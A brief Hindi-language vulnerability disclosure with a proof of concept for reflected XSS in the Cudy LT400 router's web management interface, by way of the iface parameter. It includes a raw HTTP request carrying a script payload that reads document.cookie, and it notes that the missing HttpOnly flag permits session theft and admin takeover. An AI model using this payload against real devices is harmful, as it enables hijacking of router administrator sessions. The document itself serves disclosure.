
Cudy LT400 वेब इंटरफ़ेस में परावर्तित XSS के लिए प्रमाण-की-अवधारणा, क्राफ्टेड अनुरोधों के माध्यम से सत्र कुकी चोरी और व्यवस्थापक अधिग्रहण प्रदर्शित करता है।
Cudy LT400 के वेब-आधारित प्रबंधन इंटरफ़ेस में रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) हमला मौजूद है।
पृष्ठ /cgi-bin/luci/admin/network/wireless/config में iface पैरामीटर के माध्यम से रिफ्लेक्टेड XSS है।
शोषण के तरीकों में पीड़ित को एक विशेष रूप से तैयार अनुरोध भेजना शामिल होगा जिसमें दुर्भावनापूर्ण कोड शामिल हो।
प्रभावित एप्लिकेशन सत्र कुकी को HttpOnly विशेषता के साथ सेट नहीं करता है; इसके परिणामस्वरूप सत्र टोकन चोरी के माध्यम से व्यवस्थापक अधिग्रहण हो सकता है।
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology